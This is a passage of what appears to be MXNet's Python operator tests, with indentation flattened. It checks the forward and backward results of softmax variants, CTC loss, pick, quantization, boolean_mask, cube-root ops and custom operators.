check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_device(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def np_softmax(x, axis=-1, temperature=1.0, normalize=True):
if normalize:
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x / temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def np_masked_softmax(data, mask, axis=-1, temperature=1.0, normalize=True):
neg = -1e18
if data.dtype == np.float16:
neg = -1e4
temp = np.where(mask, data, neg)
result = np_softmax(temp, axis=axis,
temperature=temperature,
normalize=normalize) * mask
return result
def np_masked_softmax_grad(out, grad_out, axis=-1, temperature=1.0):
temp = np.sum(out * grad_out, axis=axis, keepdims=True)
result = out * (grad_out - temp) / temperature
return result
def np_masked_log_softmax_grad(out, grad_out, mask, axis=-1, temperature=1.0):
grad_out = np.where(mask, grad_out, 0)
temp = np.sum(grad_out, axis=axis, keepdims=True)
result = (grad_out - np.exp(out) * temp) / temperature
result = np.where(mask, result, 0)
return result
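# Added illustrative sanity check for the reference helpers above (a sketch, not an
# original MXNet test): with an all-ones mask nothing is masked out, so
# np_masked_softmax should reduce to plain np_softmax.
def test_np_masked_softmax_reference_all_ones_mask():
    x = np.random.uniform(-2, 2, size=(3, 4))
    mask = np.ones_like(x, dtype=bool)
    assert_almost_equal(np_masked_softmax(x, mask), np_softmax(x))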
@pytest.mark.parametrize('dtype', [np.float16, np.float32, np.float64])
@pytest.mark.parametrize('axis', [0, -1, -2, -3])
@pytest.mark.parametrize('ndims', [3, 4, 5])
@pytest.mark.parametrize('n_broadcast_axis', [0, 1, 2])
@pytest.mark.parametrize('temperature', [1, 5, 9, 11])
@pytest.mark.parametrize('normalize', [True])
@pytest.mark.flaky
def test_masked_softmax(dtype, axis, ndims, n_broadcast_axis, temperature, normalize):
n_broadcast_axis = min(n_broadcast_axis, ndims - 1)
shape = rand_shape_nd(ndims, dim=10)
mx_data = rand_ndarray(shape, dtype=dtype)
bcst_dims = []
while len(bcst_dims) < n_broadcast_axis:
ax = np.random.randint(0, ndims)
if ax not in bcst_dims:
bcst_dims.append(ax)
shape_mask = list(shape)
for i in bcst_dims:
shape_mask[i] = 1
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape_mask)
mx_mask = mx.nd.array(np_mask, dtype=np.bool_)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np_masked_softmax(np_data, np_mask, axis,
temperature, normalize)
np_grad_out = np_masked_softmax_grad(np_out, np_grad,
axis, temperature)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_softmax(data=data, mask=mask,
temperature=temperature, axis=axis,
normalize=normalize)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol,
dtype="asnumpy", equal_nan=True)
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool_)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
@pytest.mark.parametrize('dtype', ['float32'])
@pytest.mark.parametrize('ndims', [1, 2, 3, 4, 5])
def test_masked_log_softmax(dtype, ndims):
shape = np.random.randint(1, 5, size=ndims)
axis = np.random.randint(0, ndims)
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape)
mx_mask = mx.nd.array(np_mask, dtype=np.bool_)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np.log(np_masked_softmax(np_data, np_mask, axis)+1e-20) * np_mask
np_out_inf = np.where(np_mask, np_out, -np.inf)
np_grad_out = np_masked_log_softmax_grad(np_out, np_grad, np_mask, axis)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_log_softmax(data=data, mask=mask, axis=axis-ndims)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out_inf], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool_)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[tuple(exp)]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_device())
labels_nd = mx.nd.array(labels, ctx=default_device())
exe = ctc._bind(ctx=default_device(), args=[acts_nd, labels_nd])
# forward in training mode (with gradient calculation)
exe.forward(is_train=True)
out_train = exe.outputs[0].copy()
# forward in inference mode (without gradient calculation)
exe.forward(is_train=False)
out_eval = exe.outputs[0]
# make sure losses calculated in both modes are the same
assert_almost_equal(out_train, out_eval)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(out_train, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_device()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size):
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_device():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
prev_np_shape = mx.set_np_shape(True)
try:
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
finally:
mx.set_np_shape(prev_np_shape)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient tol test
# due to finite difference method inaccuracies or function discontinuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
